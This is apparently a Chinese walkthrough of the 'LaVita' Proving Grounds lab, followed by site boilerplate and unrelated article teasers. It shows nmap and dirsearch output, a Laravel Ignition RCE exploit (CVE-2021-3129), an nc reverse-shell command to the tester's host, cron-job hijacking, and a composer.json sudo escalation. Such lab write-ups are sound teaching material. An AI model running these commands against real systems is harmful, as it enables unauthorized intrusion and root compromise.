LaVita pg walkthrough Intermediate

news/2024/12/1 10:52:08/文章来源:https://www.cnblogs.com/wssw/p/18579620
nmap
└─# nmap -p- -A 192.168.159.38
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 00:21 UTC
Nmap scan report for 192.168.159.38
Host is up (0.071s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.56 (Debian)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/1%OT=22%CT=1%CU=38927%PV=Y%DS=4%DC=T%G=Y%TM=674B
OS:AC78%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%TS=A)SEQ(SP=FF%G
OS:CD=1%ISR=10D%TI=Z%CI=Z%TS=A)SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)
OS:OPS(O1=M578ST11NW7%O2=M578ST11NW7%O3=M578NNT11NW7%O4=M578ST11NW7%O5=M578
OS:ST11NW7%O6=M578ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
OS:ECN(R=Y%DF=Y%T=40%W=FAF0%O=M578NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T6(R=Y%DF=Y%T=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=
OS:G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 1025/tcp)
HOP RTT      ADDRESS
1   74.12 ms 192.168.45.1
2   73.75 ms 192.168.45.254
3   74.19 ms 192.168.251.1
4   74.23 ms 192.168.159.38OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.57 seconds

显而易见了突破口只有80端口了

dirsearch
[00:23:12] Starting: 
[00:23:14] 301 -  313B  - /js  ->  http://192.168.159.38/js/
[00:23:18] 403 -  279B  - /.ht_wsr.txt                                      
[00:23:18] 403 -  279B  - /.htaccessBAK                                     
[00:23:18] 403 -  279B  - /.htaccess.bak1                                   
[00:23:18] 403 -  279B  - /.htaccess.orig                                   
[00:23:18] 403 -  279B  - /.html
[00:23:18] 403 -  279B  - /.htpasswd_test                                   
[00:23:18] 403 -  279B  - /.htaccess.save
[00:23:18] 403 -  279B  - /.htpasswds                                       
[00:23:18] 403 -  279B  - /.httr-oauth
[00:23:18] 403 -  279B  - /.htaccess.sample                                 
[00:23:19] 403 -  279B  - /.htaccess_sc                                     
[00:23:19] 403 -  279B  - /.htaccess_extra
[00:23:19] 403 -  279B  - /.htaccess_orig
[00:23:19] 403 -  279B  - /.htaccessOLD
[00:23:19] 403 -  279B  - /.htaccessOLD2                                    
[00:23:19] 403 -  279B  - /.htm
[00:23:20] 403 -  279B  - /.php                                             
[00:23:25] 405 -  835B  - /_ignition/execute-solution                       
[00:23:48] 301 -  314B  - /css  ->  http://192.168.159.38/css/              
[00:23:53] 200 -    0B  - /favicon.ico                                      
[00:23:57] 302 -  354B  - /home  ->  http://192.168.159.38/login            
[00:23:57] 403 -  279B  - /images/                                          
[00:23:58] 301 -  317B  - /images  ->  http://192.168.159.38/images/        
[00:23:59] 404 -  276B  - /javascript/editors/fckeditor                     
[00:23:59] 301 -  321B  - /javascript  ->  http://192.168.159.38/javascript/
[00:23:59] 404 -  276B  - /javascript/tiny_mce                              
[00:24:00] 403 -  279B  - /js/                                              
[00:24:03] 200 -    5KB - /login                                            
[00:24:03] 405 -  835B  - /logout                                           
[00:24:16] 200 -    5KB - /register                                         
[00:24:17] 200 -   24B  - /robots.txt                                       
[00:24:19] 403 -  279B  - /server-status                                    
[00:24:19] 403 -  279B  - /server-status/                                   
[00:24:32] 200 -    1KB - /web.config 

尝试访问不存在的路径 报错给出cms 和版本号
image

一开始以为是文件上传漏洞
image
但发现不太对 咋传都传不上去

于是根据版本搜exp
发现还真有
https://github.com/joshuavanderpoll/CVE-2021-3129
尝试执行whoami 发现成功!
python CVE-2021-3129.py --chain 'laravel/rce2' --host http://192.168.159.38/ --exec 'whoami'
image

直接来个反弹shell吧
python CVE-2021-3129.py --chain 'laravel/rce2' --host http://192.168.159.38/ --exec 'nc -e /bin/bash 192.168.45.250 80'

成功!nice

在linpeas脚本的帮助下找到了数据库密码和用户
image
然而进入数据库发现并没有啥可利用的东西
image
image

pspy64查看定时任务发现uid为1001 的用户会按时执行artisan的脚本 而且这个脚本的所有者是www-data也就是我们
image
发现uid的用户是skunk
image

重写这个文件并写入反弹shell代码
image
等待该定时任务执行
image
反弹shell成功

sudo -l 查看可提权的命令
image
查exp
image
这里我们得稍微改动一下 我们的 --working-dir必须是指定/var/www/html/lavita的
而这个目录skunk用户 是没有写入权限的 但是正好www-data 有
所以我们得先回到www-data 用户
执行这个命令
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' > /var/www/html/lavita/composer.json
image
然后再回到skunk用户 执行
image
sudo composer --working-dir=/var/www/html/lavita run-script x

提权成功
image

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/844484.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

探索性测试及基本用例

目录1 测试决策5要素 2 缺陷检测 3 探索性测试3.1 探索性测试的定义 3.2 探索性测试方法 3.3 探索性测试的核心优势 3.4 如何评估探索性测试的测试效果4 传统的测试和精益与探索式测试区别4.1 传统的测试与探索式测试的区别 4.2 探索式测试与精益5 如何实施探索性测试 6 基本测…

String类的三种常见构造方法

1.根据构造方法创建字符串对象1.public String() 创建一个空字符串,里面不包含任何内容2.public String(char[] chs) 创建一个字符数组,将其拼接成字符串对象3.public String(String original) 根据输入的字符串,创建字符串对象2.疑惑: 1.我们原来创建了对象,将其直…

考研打卡(33)

开局(33) 开始时间 2024-12-01 09:36:12 结束时间 2024-12-01 10:27:50昨天快递是室友帮我取的数据结构带权有向图G用邻接矩阵A存储,则顶点i的入度等于A中_______(扬州大学 2013年) A 第i行非∞的元素之和 B 第i列非∞的元素之和 C 第i行非∞且非0的元素之和 D 第i列非∞且…

.NET Conf China 2024 AI相关内容解析

.NET Conf China 2024中国 .NET 开发者峰会即将在上海召开,这次大会是一届完全由社区组织举办的中国.NET 开发者盛会,我们筹备大会之初就定下了大会的主题是“智能、创新、开放”。我们将聚焦于人工智能和机器学习在 .NET 中的应用,将围绕“.NET x AI”这一议程展开,汇聚了…

人工智能:在传统行业中的挑战、机遇与数据科学家角色的演变

生成式人工智能(GenAI)为我们开启了更快的开发周期、更少的技术和维护工作,以及之前看起来无法实现的创新应用场景的大门。但与此同时,它也带来了新的风险——比如幻觉问题,以及对第三方API的依赖。 对于数据科学家和机器学习团队来说,这一变革直接影响了他们的工作方式。…

铁棍山药 怀山药 All In One

铁棍山药 怀山药 All In One 怀山药中最好的是垆土地种植的铁棍山药 ✅ 怀山药 vs 淮山药 “怀”和“淮”均指产地,“怀”是指河南怀庆府即焦作温县一带,“淮”指江淮地区,包括安徽、江苏、浙江。 “怀山药”是古医药典籍中记载的有丰富营养和药用价值的山药,又叫“药用山药…

RCC

网页主要用于学习交流作者:博客园 - 域出处:https://www.cnblogs.com/SeanRIchard本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须在文章页面给出原文链接,否则保留追究法律责任的权利。若内容有侵犯您权益的地方,请公告栏处联系本人,本人定积极配合处理解决。…

2024-2025-1 20241322 《计算机基础与程序设计》第十周学习总结

2024-2025-1 20241322 《计算机基础与程序设计》第十周学习总结 作业信息这个作业属于哪个课程 https://edu.cnblogs.com/campus/besti/2024-2025-1-CFAP这个作业要求在哪里 https://www.cnblogs.com/rocedu/p/9577842.html#WEEK10这个作业的目标 ①信息系统②数据库与SQL③人工…

# 学期2024-2025-1 学号20241428《计算机基础与程序设计》第10周学习总结

学期(如2024-2025-1) 学号(如:20241300) 《计算机基础与程序设计》第X周学习总结 作业信息这个作业属于哪个课程 <班级的链接>(如2024-2025-1-计算机基础与程序设计)这个作业要求在哪里 <作业要求的链接>(如2024-2025-1计算机基础与程序设计第一周作业)这个…

2024-2025-1 20241425 《计算机基础与程序设计》第10周学习总结

2024-2025-1 20241425 《计算机基础与程序设计》第10周学习总结 作业信息这个作业属于哪个课程 https://edu.cnblogs.com/campus/besti/2024-2025-1-CFAP)这个作业要求在哪里 https://www.cnblogs.com/rocedu/p/9577842.html#WEEK10这个作业的目标 信息系统、数据库与SQL、人工…

【人人都能学得会的NLP - 文本分类篇 04】层次化多标签文本分类如何做?

【人人都能学得会的NLP - 文本分类篇 04】层次化多标签文本分类如何做? NLP Github【人人都能学得会的NLP - 文本分类篇 04】层次化多标签文本分类如何做?NLP Github 项目:NLP 项目实践:fasterai/nlp-project-practice 介绍:该仓库围绕着 NLP 任务模型的设计、训练、优化、…

举例说明html5怎么判断网络状态?

HTML5 提供了 navigator.onLine API 来判断网络状态。它是一个布尔值属性,当浏览器在线时返回 true,离线时返回 false。 然而,它有一些局限性,仅仅检测浏览器是否连接到网络,并不一定意味着网络连接有效或可以访问互联网。例如,连接到本地网络但无法访问互联网时,它仍然…